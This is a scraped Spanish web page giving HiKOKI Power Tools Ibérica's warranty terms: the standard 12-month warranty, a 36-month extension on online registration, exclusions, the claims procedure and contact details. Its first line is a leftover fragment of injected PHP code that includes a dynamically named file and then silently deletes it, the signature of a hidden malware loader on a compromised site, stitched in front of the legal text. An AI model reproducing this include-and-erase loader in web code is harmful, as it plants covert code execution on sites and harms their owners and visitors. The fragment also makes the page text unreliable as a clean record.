");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?>Términos y condiciones - HiKOKI

TÉRMINOS Y CONDICIONES

EXTENSIÓN CERTIFICADO DE GARANTÍA DE LAS HERRAMIENTAS HIKOKI, TÉRMINOS Y CONDICIONES:

 

Basado en la experiencia y conocimiento adquirido durante nuestros más de 70 años de historia, nuestra nueva marca HiKOKI sigue ofreciendo alta durabilidad y productos de alta calidad. HiKOKI ahora le ofrece el “HiKOKI Service Program” para productos HiKOKI que incluye beneficios adicionales además del servicio postventa. Esta garantía no limita las acciones de reclamación del comprador por la responsabilidad que se derive por defectos en virtud del contrato de compraventa con el vendedor, ni tampoco limita los derechos del comprador conferidos por la ley.

Las siguientes condiciones de Garantía son aplicables a los equipos comprados en cualquiera de los Puntos de Venta físicos de HiKOKI POWER TOOLS IBERICA en España y Portugal. Para equipos comprados fuera de España o Portugal, o para equipos comprados por medios electrónicos (ecommerce o similar) la garantía se tramitará OBLIGATORIAMENTE a través del vendedor, pudiendo ser las condiciones de garantía diferentes.

 

Condiciones de la garantía:

1. La garantía se ofrece conforme a lo establecido en los puntos siguientes, y cubre la reparación gratuita de los defectos que se aprecien en el equipo, por defectos en los materiales o en la fabricación, y que se pruebe se han producido dentro del plazo de duración de la garantía.

2. El plazo de duración de la garantía para los productos HiKOKI es de 12 meses, iniciándose a partir de la fecha de venta del producto. Se tendrá en cuenta la fecha indicada en el recibo de compra original, que deberá presentar en el momento de solicitar una reparación en garantía. Para los equipos que el comprador registre dentro de las 2 semanas siguientes a la fecha de compra, el plazo de duración de la garantía se incrementará a 36 meses. El registro únicamente podrá realizarse a través de la página web de HiKOKI Power Tools Ibérica S.A. Servirán como justificantes el registro en internet, que deberá presentarse impreso, y el recibo original de compra en el que conste la fecha.

2.1 Las baterías deslizantes de litio/Li-ion de 12V, 18V y MULTI VOLT comprados a partir del 1 de enero de 2021 dispondrán de garantía de 36 meses. Quedan excluidos los accesorios, cargadores y las baterías tipo presión o con tecnología distinta al litio/Li-ion. Se tendrá en cuenta la fecha indicada en el recibo de compra original, que deberá presentar en el momento de solicitar una reparación en garantía.

3. Quedan excluidas de la garantía: - Las piezas que estén sujetas a un desgaste provocado por el uso u otro tipo de desgaste natural, así como los defectos que se aprecien en el equipo que se deban a un desgaste provocado por el uso u otro tipo de desgaste natural. Estas piezas incluyen, pero no están limitadas a: engranajes, pistones, juntas tóricas, sellos, cojinetes, escobillas de carbón, cables de alimentación, fusibles, mandril o portabrocas, correas de transmisión, mangueras, bujías, filtros de aire y combustible, etc. ... - Productos deteriorados o dañados debido a la presencia de líquido u otra materia extraña en el producto. - Productos deteriorados o dañados debido a factores externos como incendio, terremoto, daños por inundación, rayo, otros desastres naturales o contaminación ambiental. - Productos dañados desde el exterior, incluido durante el transporte, o productos con deterioros o daños debido a caídas o golpes. - Productos dañados por un voltaje de alimentación incorrecto (incluidos los casos en que se excede el 10% de la tensión nominal indicada en la placa de identificación, o cuando se trabaja con un generador sin un regulador de voltaje). - Productos sobrecargados más allá de su capacidad, causando que se queme el motor, el inducido o/y el estator. - Productos deteriorados o dañados debido a un incumplimiento de las instrucciones de uso y funcionamiento, o de aplicaciones no conformes con el uso al que se destina el producto, o de factores medioambientales anormales, o de una limpieza o mantenimiento realizados inadecuadamente. (Incluyendo los casos de uso de grasa o aceite no especificados en nuestras instrucciones, o de una mezcla incorrecta de combustible y aceite). - Productos deteriorados o dañados debido al almacenamiento en un entorno inadecuado. (Incluidos los casos en que se almacenan a temperaturas extremadamente altas o bajas, se colocan debajo de elementos pesados provocando la deformación de los productos, se dejan en la intemperie quedando expuestos a la lluvia, la nieve, polvo, etc.). - Los defectos que se aprecien en el equipo, que hayan sido causados por el uso de baterías, cargadores, accesorios, complementos o repuestos que no sean piezas originales de HiKOKI. - Los equipos en las que se hayan realizado modificaciones o añadidos. - Productos ajustados, reparados, modificados (incluido el cambio de cable y/o enchufe) o desmontados por personas o empresas no autorizadas por nuestra compañía. - Productos comprados de segunda mano.

4. La solución a los defectos que HiKOKI reconozca como incluidos en la garantía se realizará gratuitamente bien mediante la reparación del equipo defectuoso o mediante la sustitución de este por un equipo que funcione correctamente (si fuera necesario también por un modelo posterior equivalente), a criterio de HiKOKI. Los equipos o piezas sustituidas pasarán a ser propiedad de la empresa.

5. Las reclamaciones en garantía podrán presentarse únicamente dentro del plazo de duración de la garantía. Para ello el comprador deberá entregar o enviar al vendedor o a uno de los Servicios de Asistencia Técnica que consten en la página web de HiKOKI, el equipo afectado, el recibo de compra original donde conste la fecha y la denominación del producto, y copia del registro en la web para aquellos equipos registrados cubiertos por la extensión de garantía. Los equipos que se presenten o envíen total o parcialmente desmontados, no se aceptarán como objeto cubierto por la garantía. En el caso de que el comprador envíe el equipo al vendedor o a un Servicio de Asistencia Técnica, la gestión y costes del transporte correrán a su cargo.

6. La presente garantía no cubrirá otras reparaciones por defectos en el equipo que se hayan producido por causas no establecidas expresamente en estas condiciones de garantía.

7. Estas condiciones de garantía son válidas para equipos, baterías y accesorios comprados a partir del 1 de enero de 2021. En el caso de facturas con albaranes de entrega en España y Portugal.

 


Registro On line del Propietario


El registro On line de la extensión de garantía debe ser completado por el propietario en un plazo máximo de 2 semanas desde la fecha de compra. Esta es una condición obligatoria y necesaria para la cobertura bajo esta garantía. La inscripción sólo se puede hacer por internet a través de www.hikoki-powertools.es y sólo será posible si el usuario está de acuerdo con el almacenamiento de sus datos y si los datos coinciden con los introducidos.


En caso de optar por no hacer el registro de la garantía On line dentro de las 2 semanas, la herramienta tendrá la garantía estándar de 1 año.


Cobertura de la garantía


El período de garantía empieza en el momento que se adquiere la nueva herramienta, la fecha de inicio es la fecha que pone en la factura original de compra. Los servicios prestados en virtud de la garantía extendida de la herramienta no renuevan o alargan el período de garantía.


Una reclamación de garantía válida requiere la presentación de la herramienta completa (que ha de coincidir con el número de serie con el formulario de registro), el registro de garantía y la factura de compra original donde se debe especificar el modelo, el número de serie y la fecha de compra.
HiKOKI Ibérica sólo se hará cargo de los costes de transporte durante los primeros 12 meses de garantía y para herramientas adquiridas en España y Portugal.


Por favor consulte en el sitio web de https://hikoki-powertools.es/es/content/7-servicios-oficiales de HiKOKI o llame al 93. 735. 67.22 para localizar su centro de servicio oficial más cercano.


Para esta garantía comercial será de aplicación el Derecho Español. Todos los productos están sujetos a la ley 23/2003, de 10 de julio, de Garantías en la Venta de Bienes de Consumo.


HiKOKI Power Tools Ibérica, S.A. C/ Puigbarral, 26 – P.I. Can Petit 08227 Terrassa (Barcelona)